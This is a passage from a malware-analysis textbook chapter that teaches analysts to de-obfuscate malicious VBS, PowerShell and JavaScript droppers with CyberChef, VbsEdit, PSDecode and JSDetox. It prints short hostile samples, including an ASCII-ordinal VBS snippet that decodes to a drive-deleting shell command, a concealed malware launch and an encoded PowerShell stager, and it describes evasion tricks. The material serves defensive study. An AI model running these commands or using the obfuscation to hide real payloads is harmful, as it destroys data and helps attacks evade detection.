Often during malware analysis, a malicious binary is not the initial stage that presents to the end user. Somewhat frequently, an initial "dropper" in the format of a script—be it PowerShell, Visual Basic Scripting (VBS), a malicious Visual Basic for Applications (VBA) macro, JavaScript, or anything else—is responsible for the initial infection and implantation of the binary.
This has been the case in modern times with malware families Emotet, Qakbot, TrickBot, and many others. Historically, VBA scripts have comprised the entirety of a malware family—for instance, ILOVEYOU, an infamous virus from the early 2000s written in Microsoft's own VBS language.
In this chapter, we'll examine the following points that will assist us with de-obfuscating malicious scripts, somewhat akin to attempting to push toothpaste back into a tube after it's already been dispensed.
At the end of the chapter, you'll also have the opportunity to test the skills you've acquired by de-obfuscating malicious scripts provided during the course of the chapter!
We'll cover the following topics:
These are the technical requirements for this chapter:
Several obfuscation techniques are common across scripting languages, and it's important that we understand what is being done in an attempt to slow down analysis of a dropper or piece of malware and hinder incident response. We'll take a brief overview of some of the more common techniques that are utilized by adversaries in an attempt to prevent analysis within this section.
One of the more common techniques utilized both within PowerShell and VBS or VBA malicious scripts is the encoding of strings. Encoding of strings, or function and variable names, makes the code harder to follow and analyze, as it is no longer written in plain English (or any other human-readable language). There are a few choices that are popular, but we'll cover the most popular ones.
Base64 is a binary-to-text encoding scheme that allows users to input any American Standard Code for Information Interchange (ASCII) text into an algorithm, with output that is no longer easily human-readable, as illustrated here:
Figure 8.1 – Utilizing the Base64 application to create encoded strings
As you can see, the string appears as though it may be random text, but does in fact easily decode from the VGhpcyBpcyBhIG1hbGljaW91cyBzdHJpbmcu value back to the text that was provided to the Base64 algorithm.
We can recognize Base64 by understanding the alphabet that is utilized. In short, Base64 will always use the A-z/+= character set. That is to say, Base64 can utilize all capital and lowercase A-Z ASCII characters, along with the forward slash, the plus sign, and the equals sign for padding.
Analysis tip
Base64 strings must always be in a string of characters divisible by four, so '=' is appended to any string that is not divisible by four as padding to ensure the 4-byte chunk is reached. If you recognize a string that fits these alphabet requirements, chances are it's Base64.
In order to decode our identified Base64 strings, we can utilize the CyberChef tool from Government Communications Headquarters (GCHQ), located at https://gchq.github.io/CyberChef/. The tool can be seen in the following screenshot:
Figure 8.2 – Utilizing CyberChef to decode Base64 strings
Once we've selected the From Base64 recipe and put in our input string into the Input box, CyberChef will automatically parse our string through the Base64 decoding algorithm and present us with the corresponding ASCII string.
Recognizing Base64 is key to being able to de-obfuscate scripts and understand what steps threat actors are taking in order to hide their actions from analysts. However, it is not the only encoding scheme that is in use.
Base64 is not the only encoding alphabet on the block. Also available are Base62, Base58, and Base85, though the 64 variant is by far the most popular. Key to understanding all of these variants is knowing the alphabets that are utilized by the encoding algorithm and being able to quickly decipher and differentiate between those utilized.
The following table outlines the key alphabet differences between each of the encoding algorithms:
Table 8.1 – The alphabets of Base-encoding algorithms
With this knowledge, it should be easy to differentiate between the different encoding schemes in their utilization and decode them accordingly, to see what bad behavior whatever threat actor we are examining is undertaking within their dropper code.
Another popular encoding method is to utilize the numerical representations of ASCII characters. In ASCII, each character is assigned a numerical representation. The table shown in the following screenshot identifies all of the codes that correspond with the ASCII letter they represent on the keyboard:
Figure 8.3 – The ASCII ordinal table
The ASCII codes may be substituted in variable names, decoded into meaningful strings or code utilizing built-in functions within VBS, PowerShell, or other languages such as Chr(), then passed to another function within the code for execution. Let's take a look at the following example:
Dim Var1 as String
Var1 = "099 109 100 046 101 120 101 032 047 099 032 100 101 108 116 114 101 101 032 099 058 092 032 047 121"
Function func1(varStr)
On Error Resume Next
varStr2 = Chr(varStr)
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run varStr2
In the following example, a group of ASCII ordinals is first converted back to regular characters utilizing VBS's built-in Chr() function then passed to a WScript.Shell instance that was created, which then executes the corresponding malicious string as a command on the command line:
Figure 8.4 – Converting ASCII ordinals back to text
Unfortunately, at the time of writing, CyberChef does not have a built-in recipe with which to decode or encode ASCII ordinals to characters and vice versa. However, several instances of these can be found online by simply googling them. Copying the preceding ordinal string into one of these should reveal the malicious command that is being run.
Encoding within Base algorithms is not the only technique available to malware authors. Besides utilizing these and readable ASCII, it is also possible to utilize hexadecimal notation in order to obtain obfuscation of the script yet retain easy conversion back to executable script.
Hexadecimal is fairly easy to recognize, based on its relatively short alphabet and usual notations. The alphabet for hexadecimal is simply A-F0-9—that is to say, all letters A-F, and all numbers 0-9. Case does not matter for hexadecimal notation. If any letter within a string is seen that is beyond F within the alphabet, you can rest assured that it is not, in its current form, hexadecimal notation.
Analysis tip
Various delimiters are utilized for hexadecimal notation, including 0x, x, x, %, CRLF, LF, and spaces. However, they all perform the same function of separating the two preceding hexadecimal bytes from the following two hexadecimal bytes.
We can take a look at several examples, and utilize CyberChef as we did with Base encoding to decode our samples. Let's try the following strings:
The following screenshot shows hexadecimal characters being converted to ASCII characters in CyberChef:
Figure 8.5 – Converting hexadecimal to ASCII characters in CyberChef
Utilizing the From Hex recipe within CyberChef, we can select the correct delimiter (or leave it on Auto to have CyberChef decide) that separates each 2-byte subsection of our string and get the correct output returned!
Obviously, encoding is not the only tool that can be utilized by malware authors to obfuscate their payloads. In the next few sections, we'll take a look at other methodologies, starting with string concatenation.
Encoding strings is not the only way a malicious author can hide their intentions and make instructions within scripting difficult to read. Another common methodology is to concatenate multiple separate strings in order to form a complete command.
In essence, several chunks of code are separately stored in various variables that do not make sense on their own and are then later combined into a single string that makes sense when their execution is required.
To make more sense of this technique, we can take a look at an example here:
$var1 = "scri"
$var2 ="pt.she"
$var3 = "ll"
$var5 = "w"
$var5 = New-Object -ComObject ("$var5 + $var1 + $var2 + $var3")
The preceding example is in Windows PowerShell, and concatenates five variables while passing them to the New-Object cmdlet. It's fairly obvious in this example that the command the malicious actor is utilizing is creating a new WScript Shell in which to pass further malicious scripts.
While it is not always this obvious what the author intended in their string concatenation, several variables being chained together in arguments should be an immediate cause for concern, and string concatenation should be assumed by the examining analyst.
A close cousin of string concatenation, string replacement creates strings with meaningless data within the middle of executable code. Let's take a look at an example of string replacement here, in order to understand the impact of this:
$var1 = cmAQGlXFeGhOd.exe /c AQGlXFeGhO%appAQGlXFeGhOdaAQGlXFeGhOta%malwAQGlXFeGhOare.exAQGlXFeGhOeAQGlXFeGhO
StartProcess(($var1 -Replace "AQGlXFeGhO" ""))
As shown in the preceding example, you can see a randomly generated string has been inserted into the otherwise valid command, obfuscating it and making it quite difficult to read at a glance without either superhuman powers or considerable effort. However, it still easily executes at runtime when the characters are replaced by PowerShell during or before the StartProcess cmdlet is called, as illustrated here:
Figure 8.6 – String replacement in a CARBON SPIDER dropper
Often, string replacement can be utilized in combination with concatenation to create code that is very difficult to read and time-consuming to reverse for an analyst.
Playing with strings in various ways is not the only way that malware authors can obfuscate the true objective of their code. There are various other methods employed, often in combination with encoding, substitution, and concatenation methodologies.
In normal coding, it's generally important to give functions and variables meaningful names in order to assist future programmers who may work on your project in understanding execution flow and the purposes for the decisions you have made during the course of your creation of the script or program.
This is not the case in malware. In malicious scripts, it's often the case that variables, functions, and arguments passed to these functions are given random, meaningless, or outright misleading names in order to purposefully hinder analysis of the dropper in question, as can be seen in the following example:
Figure 8.7 – Useless, random variable names in a Qakbot dropper
Another methodology utilized is to insert code that does nothing—the primary purpose of the code may be able to be accomplished in 5-10 lines of code, but the dropper may include hundreds or thousands of lines, including functions that are never called, or return null values to the main function, and never affect the execution flow of the dropper. An example of this can be seen here:
Figure 8.8 – A function that does nothing and returns no values in a Qakbot dropper
The impact of this is that it makes it far more difficult for an analyst or heuristic code analyzer to locate the true beginning of execution of the malicious script.
Now that we have a good understanding of some of the methodologies that may be employed by threat actors, we can now examine how we may begin obfuscating malicious scripts and droppers employed by these actors.
In this section, we'll take a look at some of the methodologies we've learned about and learn a few shortcuts to de-obfuscating malicious VBS and VBA scripts within our Windows virtual machine (VM) to understand what the malicious author may be attempting to accomplish.
Malicious VB scripts are one of the more common methodologies in use throughout the history of malware as it's easy to code in, easy to learn, ubiquitous, and powerful within the environment that comprises most malware targets—Windows.
A free tool, VbsEdit, is one of the best methods to approach de-obfuscation of VB-based scripts. The tool can be obtained from the link within the Technical requirements section at the beginning of this chapter.
Once the tool is downloaded, proceed through the installation, accepting default options—they'll work perfectly.
Of note, the tool does have an optional license but it is not required, and the evaluation period does not expire.
Once open, click Evaluate within the prompt, and proceed to the main window.
Here, we'll open a malicious VBS example from the CARBON SPIDER threat actor to examine what information we can pull out of the script via debugging and evaluation, utilizing the VbsEdit tool. The tool can be seen in the following screenshot:
Figure 8.9 – The Open button in VBSEdit
First, we'll utilize the Open button and then load our selected script from the filesystem. Once we've done this, we can simply click Start Debugging with CScript and allow the script to run, as illustrated in the following screenshot:
Analysis tip
Debugging the script is dynamic! The malicious script will be executed on your system as a result of running this. Ensure that you are properly sandboxed, as outlined in previous chapters, before running this!
Figure 8.10 – The obfuscated CARBON SPIDER dropper
Once the script has finished running, a new tab will appear entitled eval code:
Figure 8.11 – The evaluated code tab within VbsEdit
Upon clicking this, you'll see that the obfuscated actions within the code have been transformed into fairly readable code! Unfortunately, it's all on a single line—but with some quick formatting changes, we'll have the full, de-obfuscated script.
Thankfully, there's a standard delimiter within VbsEdit—the colon denotes each new command. Utilizing Notepad++'s Find and Replace feature with Extended search mode allows us to replace each instance of a colon with —a newline character in Windows. This is illustrated in the following screenshot:
Figure 8.12 – Finding and replacing the delimiter within Notepad++
Once we utilize this delimiter to replace the colons, Notepad++ will basically format the entirety of the dropper for us, as illustrated in the following screenshot:
Figure 8.13 – Perfectly formatted, totally de-obfuscated CARBON SPIDER dropper
Being sure to skip valid uses of a colon within strings within the script (Uniform Resource Locators (URLs), Windows Management Instruction (WMI) commands, and so on), we can replace each one with a new line and obtain a full copy of the malicious script!
While VbsEdit is certainly the best way to deobfuscate malicious VBS scripts, it's not the first way, and certainly isn't the only one. We can also utilize built-in utilities such as Echo in WScript.
In some instances, it may be useful to obtain the value of a single variable within a script as opposed to dynamically executing and obtaining a full copy of a de-obfuscated script. In these instances, Echo can be utilized within the script in order to obtain the value.
Simply locate where you believe the variable to be set to the desired value you'd like to return, and add in a line that echoes the variable name with Echo(Variable). While this method does have its benefits, it's much more beneficial to utilize the previously discussed VBS Debugger to obtain a full copy of the script if you already have a detonation environment set up in the proper manner.
While malicious VBS droppers are certainly still in vogue due to the ability to run them on any version of Windows in use today, other malicious scripts and droppers written in PowerShell also exist.
Perhaps one of the most common scripting languages in use for both malicious and legitimate administration purposes is the built-in Windows scripting engine based on .NET—PowerShell.
PowerShell has been embraced readily by threat actors, red teamers, and systems administrators alike to accomplish their ends due to its power.
As a result of this power, it's also incredibly easy to obfuscate PowerShell scripts in many different ways. We'll take a look at a few examples exclusive to PowerShell, and a real-world example utilized by Emotet!
First, we'll take a look at a few examples that are utilized by PowerShell that are generally unique to PowerShell malware samples.
The first method (which is one of the most commonly utilized obfuscation methods) is compression, as shown in the following code snippet:
.($pshOme[21]+$PsHomE[30]+'X') (NEw-obJECt iO.STREAmREAdER ( ( NEw-obJECt SyStEm.iO.cOMpREssIOn.DeflAtEstreaM([SYstEM.Io.MemoRYsTREaM] [sYSTEm.CONvERt]::FROMBAsE64sTRinG ('TcmxDkAwFAXQX5FOJLzuVmJkMHSxFDdReW1FX1L+3uqspxyRm2k9sUkxv 0ngaYSQwdqxQ5CK+pgDR7sPjlGqQ+RKrdZ4rL8YtEWvveVsbxAeqLpQXbs YF/aY0/Kf6gM='),[SYSteM.iO.CoMPresSIOn.cOMPReSSIoNmoDE]::DECompReSS)), [sysTeM.TeXT.EncODinG]::asCIi) ).reAdtOENd()
As you can see, several obfuscation methods are utilized here. First, Base64 encoding is utilized to obfuscate what appears to be a string that is being utilized by the System.IO.Compression.DeflateStream cmdlet. Let's grab the Base64 string and paste it into CyberChef to try to decode what it holds, as follows:
Figure 8.14 – Binary data from a Base64-encoded string in CyberChef
Unfortunately, decoding the data appears to have returned binary as opposed to ASCII commands in this instance. No matter—CyberChef has another recipe that will be of use! As we can see the DeflateStream directive, we know that we should utilize the Raw Inflate recipe within CyberChef to reverse the action taken during obfuscation, as illustrated in the following screenshot:
Figure 8.15 – Inflating the binary data from within CyberChef to return the ASCII command
With Raw Inflate interpreting the binary data, we can now see what the obfuscated command is attempting to do!
PowerShell offers several methods for obfuscation that are unique to the language itself but fall within the categories previously covered. However, it's important to mention them in the context of PowerShell, since they can differ somewhat.
Command tokens (cmdlets) can be separated and obfuscated by utilizing backticks (grave accents) within the command token—for example, New-Object becomes 'N`ew-O`b`je`c`t. This is particularly powerful when combined with other methods.
Concatenation is not limited to variables within PowerShell—it can also be applied to command tokens and cmdlets—for example, New-Object could become & ('Ne'+'w-Ob'+'ject').
PowerShell, generally speaking, does not interpret whitespace. When combined with backticks and string concatenation, it's possible to make even normal cmdlets very confusing. For example, New-Object may become ( 'Ne' +'w-Ob' + 'ject') or similar.
Perhaps the most complex method, the malicious author may choose to load substrings of a command into an array, and then execute them in the proper order by pulling each substring out of the array and then re-concatenating it. For example, see the following code snippet:
.("{1}{0}{2}"-f'e','N','w-Object')
In this example, New-Object is loaded into an array with the following values:
As such, each value is called in the order that makes sense—1, 0, 2—and then executed!
With knowledge of these obfuscation techniques, let's now take a look at an example.
Let's take a look at an obfuscated Emotet PowerShell command in order to see if we can manage to de-obfuscate and extract the dropper domains from the script to find which domains we should be blocking requests to at our firewall. Let's look at the command, which can be found in the malware samples downloaded for this chapter in EMOTET.txt:
First, we can utilize the From Base64 recipe within CyberChef, which will decode and give us the output of the Base64-encoded string, as illustrated in the following screenshot:
Figure 8.16 – First step: decoding of the Emotet dropper
We can see that there are several null bytes also within this command—these are represented by the '.' character within CyberChef. We'll go ahead and remove these with the Remove Null Byte recipe, as illustrated in the following screenshot:
Figure 8.17 – Second step of decoding, with null bytes removed from the dropper
We're definitely making some progress! However, we can see some fairly dense concatenation, utilizing what looks like the characters + and (), and whitespace. Utilizing Find / Replace recipes within CyberChef, we can substantially cut down on the noise the concatenation characters are causing, and smash all the characters back together, as illustrated in the following screenshot:
Figure 8.18 – Third step in decoding, with erroneous whitespace and concatenation characters removed
We're definitely almost there! Now, it just looks like we have a few more steps. As we can see, where HTTP(s) would normally be, it appears to be replaced with ah. We can create a simple find-and-replace REGEX rule to replace ah with http, as illustrated in the following screenshot:
Figure 8.19 – Extracting the URLs from the Emotet dropper
Once done, we can simply utilize the Extract URLs recipe to pull all of the command and controls (C2s) out of the script!
Now that we have covered several different ways to de-obfuscate code semi-manually, let's take a look at some of the automated tools utilized by attackers, and some of their counterparts in incident response.
There are several tools that are useful for both obfuscating and de-obfuscating malicious scripts. We'll touch on several of these, and also their de-obfuscation counterparts.
Invoke-Obfuscation is a powerful tool written by an ex-Mandiant red-team employee. It can take existing PowerShell scripts that have not been obfuscated in any way, and fully obfuscate them to evade endpoint detection and response (EDR) detection and make analysis more difficult for analysts. If you'd like to practice creating obfuscated scripts, the tool can be downloaded from https://github.com/danielbohannon/Invoke-Obfuscation. You can see the tool in action in the following screenshot:
Figure 8.20 – The splash screen and options for Invoke-Obfuscation
The blue-team counterpoint to Invoke-Obfuscation is PSDecode, which attempts to go through line by line to de-obfuscate and reverse compression or exclusive OR (XOR) methodologies used to hide or otherwise make difficult the analysis of malicious PowerShell scripts. PSDecode is shown in action in the following screenshot:
Figure 8.21 – Example output for PSDecode
This tool should be considered essential to any malware analyst's toolbox, and may be downloaded from https://github.com/R3MRUM/PSDecode.
There are many JavaScript obfuscation frameworks available—too many to name. However, the Metasploit JavaScript obfuscator is probably the most commonly used. An example of the output produced by the Metasploit JavaScript obfuscator is provided in the following screenshot:
Figure 8.22 – Example of obfuscated JavaScript by the Metasploit obfuscator
Obviously, this does not make for particularly readable code. Thankfully, the JSDetox tool, which can be downloaded from http://www.relentless-coding.com/projects/jsdetox/, can make short work of most JavaScript obfuscation. This is shown in the following screenshot:
Figure 8.23 – The same Javascript, run through JSDetox
A sample output of the previous code snippet would be as shown in the preceding screenshot. This makes for much more obvious code! We can now see that the payload is creating a backdoor with CLSID persistence, and the payload is hosted on localhost on port 8080!
A plethora of tools exist for other languages, but with JavaScript, VBS, and PowerShell comprising the vast majority of languages, these will serve you well as an analyst in combination with CyberChef and understanding encodings when you see them!
Utilizing CyberChef, any automated tools covered, and the Qakbot.txt and EMOTET_2.txt samples within the Technical requirements section, attempt to answer the following questions:
In this chapter, we covered basic methods of de-obfuscation utilized by threat actors in order to hide the malicious intents of their script(s). With this knowledge, it's now possible for us to recognize attempts to hide data and action on objectives from us.
We can utilize this knowledge to leverage the tools we learned about—PSDecode, VBSDebug, and CyberChef to collect indicators of compromise (IOCs) and better understand what a malicious script may be trying to do or stage on a system. As a result, we are better prepared to face the first stage of adversarial software head-on.
In the next chapter, we'll review how we can take the IOCs we collect as a result of this and weaponize them against the adversary to prevent breaches in the first place!